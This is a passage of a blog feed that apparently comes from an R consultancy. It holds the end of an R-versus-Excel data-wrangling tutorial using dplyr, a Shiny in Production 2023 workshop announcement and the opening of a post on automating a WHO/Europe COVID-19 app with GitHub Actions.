&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(movies_data, year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2012 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 South Ko… 2012 11 5 1333&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Again, because Excel is point-and-click, it is
impossible to identify, by looking at a column, how the data was
modified. If I were to replicate these steps in two years’ time I would
likely have forgotten where to point and click. With R, however, we have
our code, which clearly shows each step used to manipulate the data. If I
were to return to my script in two years’ time, I would easily be able to
replicate the analysis.&lt;/p&gt;
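&lt;p&gt;Sorting in the other direction, or by more than one column, is a small change to the same call. As a sketch, using a hypothetical &lt;code&gt;films&lt;/code&gt; data frame rather than the &lt;code&gt;movies&lt;/code&gt; data, &lt;code&gt;desc()&lt;/code&gt; from {dplyr} reverses the order and additional column names are used to break ties:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;library(&amp;#34;dplyr&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Hypothetical stand-in data, for illustration only
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;films = data.frame(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  country = c(&amp;#34;England&amp;#34;, &amp;#34;America&amp;#34;, &amp;#34;China&amp;#34;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  year = c(2012, 2011, 2013)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Most recent year first
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;newest_first = arrange(films, desc(year))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Sort by country, then by year within each country
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;by_country = arrange(films, country, year)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;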
&lt;h4 id="3-selecting-and-adding-a-new-column"&gt;3. Selecting and adding a new column&lt;/h4&gt;
&lt;p&gt;Let’s reduce our data set by first selecting the &lt;code&gt;country&lt;/code&gt;, &lt;code&gt;year&lt;/code&gt;,
&lt;code&gt;number_movies&lt;/code&gt; and &lt;code&gt;highest_profit&lt;/code&gt; columns. Then we will generate a
new column called &lt;code&gt;complete_profit&lt;/code&gt;. The &lt;code&gt;complete_profit&lt;/code&gt; column is
calculated by dividing the &lt;code&gt;highest_profit&lt;/code&gt; column by the
&lt;code&gt;number_movies&lt;/code&gt; column.&lt;/p&gt;
&lt;h4 id="excel-5"&gt;Excel&lt;/h4&gt;
&lt;p&gt;&lt;img alt="Manually creating a new column using Excel." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/new_column.gif" width="600"&gt;&lt;/p&gt;
&lt;h4 id="r-5"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(country, year, number_movies, highest_profit) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(complete_profit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; highest_profit&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;number_movies)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year number_movies highest_profit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 3 100&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 2 150&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 4 300&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 2 130&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 1 more variable: complete_profit &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="4-removing-a-column"&gt;4. Removing a column&lt;/h4&gt;
&lt;h4 id="excel-6"&gt;Excel&lt;/h4&gt;
&lt;p&gt;In Excel, inserting or deleting a column is a manual process. First, we
select the column, then right-click its header and
choose the Delete option.&lt;/p&gt;
&lt;h4 id="r-6"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(movies_data, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 300 4 4000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 130 2 4020&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R, we simply used the &lt;code&gt;select()&lt;/code&gt; function from the {dplyr} package, which
chooses columns of our data frame. To remove a column we put a &lt;code&gt;-&lt;/code&gt; in
front of its name to exclude it from our data.&lt;/p&gt;
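&lt;p&gt;The same minus-sign idea extends to several columns at once. A minimal sketch, assuming a small hypothetical data frame called &lt;code&gt;films&lt;/code&gt; (not the &lt;code&gt;movies&lt;/code&gt; data):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;library(&amp;#34;dplyr&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Hypothetical stand-in data, for illustration only
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;films = data.frame(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  country = c(&amp;#34;England&amp;#34;, &amp;#34;America&amp;#34;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  year = c(2011, 2012),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  no_employees = c(1500, 2000)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Drop two columns in one call
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;select(films, -c(year, no_employees))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Equivalent, using ! to take the complement of the selection
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;select(films, !c(year, no_employees))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Neither call modifies &lt;code&gt;films&lt;/code&gt; itself; the result has to be assigned to a name if it is needed later.&lt;/p&gt;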
&lt;h4 id="5-select-only-the-entries-for-a-particular-year"&gt;5. Select only the entries for a particular year&lt;/h4&gt;
&lt;h4 id="excel-7"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Here we are interested in extracting the data collected only during the
year 2021. Using Excel, we first sort the year column and then
manually select the rows for the year that we are interested in. With this
manual technique of selecting pieces of data,
it is very easy to select the wrong data or even accidentally delete
data.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif to manually retain all the data collected during the year 2021." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/subsetting.gif" width="600"&gt;&lt;/p&gt;
&lt;h4 id="r-7"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(movies_data, year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 4 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 America 2021 800 3 6800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 England 2021 120 1 1325&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2021 800 3 6800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 China 2021 230 2 3101&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="6-remove-only-the-row-entries-from-2-4"&gt;6. Remove only the row entries from 2-4&lt;/h4&gt;
&lt;h4 id="excel-8"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Removing rows in Excel is once again a manual process. We select the
rows that we do not want to keep, then right click and delete those
rows. These rows are now permanently deleted from the data sheet. If we
wanted to add them back into the sheet, we would have to
find them (if we had a backup Excel sheet) and copy and paste them back
into our data analysis Excel sheet. If we did not have a backup of the
data that we had deleted, then this data would be completely lost.&lt;/p&gt;
&lt;h4 id="r-8"&gt;R&lt;/h4&gt;
&lt;p&gt;In R we can use the &lt;code&gt;slice()&lt;/code&gt; function to return a subset of rows based
on their position. If you want to remove rows using &lt;code&gt;slice()&lt;/code&gt; instead of
retaining them you can just add a &lt;code&gt;-&lt;/code&gt; in front of the row indices you’re
passing into the function. So, to remove rows 2, 3, and 4:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(movies_data, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 23 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## country year highest_profit number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 South Ko… 2013 177 3 5300&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2014 350 1 3150&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 South Ko… 2015 700 6 6000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 19 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="using-r-and-excel"&gt;Using R and Excel&lt;/h3&gt;
&lt;p&gt;Data manipulation is a core part of data science, and there are several
ways to do it efficiently. Whichever tool you use, be it R or Excel, the data
must be organised in a format that the software can read.&lt;/p&gt;
&lt;p&gt;Excel is an excellent, easy-to-use tool, and at times it is the
most appropriate one. It is often used for general, basic data processing
in an office setting. However, Excel is limiting
in that a single worksheet can hold only 1,048,576 rows (roughly 1 million)
without the aid of other tools. Its built-in statistical analysis
is basic and of limited practical value for more demanding work. If you are an
aspiring data analyst, you will need to expand your toolset and start
thinking beyond the rows and columns of a spreadsheet. R packages cover
almost any area where data is needed. Getting started with R is
straightforward, thanks to its readable syntax.
Most importantly, R facilitates reproducible analyses.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A hammer is great for driving nails, but it’s not the only tool out
there.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you’re interested in learning R, then attend our &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to
R&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2023: Workshops</title><link>https://www.jumpingrivers.com/blog/sip23-workshops/</link><pubDate>Tue, 21 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip23-workshops/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip23-workshops/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip23-workshops/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Shiny in Production is returning to &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;the Catalyst&lt;/a&gt; this October! Our workshop lineup has now been finalised, and our first two speakers are confirmed. If you want to read more about the speakers, or register for the conference, &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;head over to the website&lt;/a&gt;. Early bird tickets are now on sale!&lt;/p&gt;
&lt;p&gt;For the workshops this year, we see the return of the extremely popular Introduction to Posit (formerly RStudio) Connect, as well as two new Shiny-centred topics.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-sip23-workshops"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="shiny-and-python"&gt;Shiny and Python&lt;/h3&gt;
&lt;p&gt;Gone are the days when Shiny was only for R programmers! In the last year, &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; have released &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt;. Further information on the workshop to follow!&lt;/p&gt;
&lt;h3 id="building-responsive-shiny-apps"&gt;Building Responsive Shiny Apps&lt;/h3&gt;
&lt;p&gt;The diverse range of devices used for modern web browsing presents challenges when designing an application that works well for all users. Enter responsive design: the practice of building fluid web pages that “work” on huge 4k and 5k monitors, tiny smartphones and all things in between. This course will look at responsive design principles and best practices for Shiny developers, covering page layout, easy-to-add widgets and some simple CSS tricks for when built-in solutions don’t quite cut it.&lt;/p&gt;
&lt;h3 id="shiny-testing"&gt;Shiny Testing&lt;/h3&gt;
&lt;p&gt;This is the newest of our workshops that we&amp;rsquo;re planning for the conference, so we&amp;rsquo;ll have more information on what to expect very soon. If you&amp;rsquo;re interested in the topic in the meantime, take a look at our &lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/" rel="external"&gt;recent blog series&lt;/a&gt; on end-to-end testing with &lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;{shinytest2}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip23-workshops/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Work smarter; not harder: COVID-19 processing for the WHO/Europe</title><link>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/</link><pubDate>Thu, 16 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Last night, I filled a washing machine with laundry and scheduled it to finish in the morning.
And do you know what I had to do next? Nothing. I simply went to bed.
In stark contrast to 100 years ago, I didn’t need to fill a bucket with water,
I didn’t spend an hour rubbing clothes against a washboard to agitate away the dirt,
and I didn&amp;rsquo;t need to worry about whether the prolonged contact between
a cleaning detergent and my hands was damaging to the skin.
Instead, a machine followed its pre-programmed routine, and I slept like a log.
And what could possibly be better than an extra hour in bed?&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s just one of many examples of the small automated processes that appear throughout our lives.&lt;/p&gt;
&lt;p&gt;But they all have a common purpose: to make our lives easier.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re a regular on our blog, you may have already read about
&lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;how we streamlined the data processing&lt;/a&gt;
on an application we&amp;rsquo;re maintaining for the World Health Organisation Europe (WHO/Europe).
Those steps improved the experience for users of their
&lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" target="_blank"&gt;WHO/Europe COVID-19 Vaccine Programme Monitor&lt;/a&gt;,
by slashing loading times and improving responsiveness.&lt;/p&gt;
&lt;p&gt;But today, I want to tell you about how automation improved the experience for those
working behind the scenes of the application.
Tasks were completed automatically, taking away opportunities for human error to sneak in to our processes.
Work was autonomously performed each day, providing early warnings about issues with the latest data.
Software was frequently tested on a clean environment, verifying that our work could be reproduced on other systems.&lt;/p&gt;
&lt;p&gt;Ultimately, developers and maintainers from both Jumping Rivers and the WHO/Europe
spent less time on the trivial and repetitive tasks,
and more time making improvements where it really mattered.
And by sprinkling a little automation in your work, you might just enhance your productivity too.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-who-shiny-maintenance-github-actions"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="where-can-we-delegate-the-tasks-to"&gt;Where can we delegate the tasks to?&lt;/h2&gt;
&lt;p&gt;The aim of these automated workflows is to take some of the menial tasks that are frequently
performed, and complete them automatically using a &lt;a href="https://en.wikipedia.org/wiki/CI/CD" target="_blank"&gt;continuous integration and continuous delivery&lt;/a&gt; (CI/CD) pipeline.
Many options for performing CI/CD pipelines exist already&amp;mdash;such as
&lt;a href="https://www.jenkins.io/" target="_blank"&gt;Jenkins&lt;/a&gt;,
&lt;a href="https://docs.gitlab.com/ee/ci/" target="_blank"&gt;GitLab CI/CD&lt;/a&gt;,
&lt;a href="https://bitbucket.org/product/features/pipelines" target="_blank"&gt;Bitbucket pipelines&lt;/a&gt;,
&lt;a href="https://circleci.com/" target="_blank"&gt;CircleCI&lt;/a&gt; to name just a few&amp;mdash;
but in the case of the WHO/Europe COVID-19 Vaccine Programme Monitor,
we utilized &lt;a href="https://github.com/features/actions" target="_blank"&gt;GitHub Actions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In a typical CI/CD pipeline, we are allocated a blank machine, onto which we can install all
the software dependencies we need and run our tasks, before the machine is wiped back out of existence.
Now it may sound wasteful to be installing everything from scratch every time a pipeline runs,
but there are serious benefits here: starting from scratch is the ultimate check of whether our
code is portable and can be run by anyone from any machine.
And with &lt;a href="https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/"&gt;a few tricks here&lt;/a&gt; and a bit
of caching there, set up times for CI/CD pipelines can actually be very reasonable.&lt;/p&gt;
&lt;h2 id="the-basic-concept-of-an-automated-workflow"&gt;The basic concept of an automated workflow&lt;/h2&gt;
&lt;p&gt;For GitHub Actions, we specify a few things in a YAML file:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;When the workflow should run.&lt;/li&gt;
&lt;li&gt;What operating system our virtual machine should use.&lt;/li&gt;
&lt;li&gt;What environment variables should be defined.&lt;/li&gt;
&lt;li&gt;What tasks should be performed.&lt;/li&gt;
&lt;/ol&gt;
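&lt;p&gt;As a rough illustration, those four pieces map onto a workflow file along the following lines. This is a minimal sketch rather than the workflow used for the WHO/Europe app: the file name, workflow name, job name and &lt;code&gt;EXAMPLE_VARIABLE&lt;/code&gt; are placeholders chosen for this example.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;# .github/workflows/example.yaml (hypothetical file name)
name: example-workflow

# 1. When the workflow should run
on:
  push:
    branches: [main]

jobs:
  example-job:
    # 2. The operating system of the virtual machine
    runs-on: ubuntu-latest
    # 3. Environment variables (placeholder name and value)
    env:
      EXAMPLE_VARIABLE: some-value
    # 4. The tasks to perform, in order
    steps:
      - uses: actions/checkout@v3
      - name: Print the placeholder variable
        run: echo Value is $EXAMPLE_VARIABLE
&lt;/code&gt;&lt;/pre&gt;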
&lt;h2 id="what-do-we-automate"&gt;What do we automate?&lt;/h2&gt;
&lt;h3 id="tests"&gt;Tests&lt;/h3&gt;
&lt;p&gt;There are a number of processes that we automate, but we&amp;rsquo;ll start with the one that most
developers will want to automate: Testing.
It&amp;rsquo;s a good idea to have tests run when changes are made to the code.
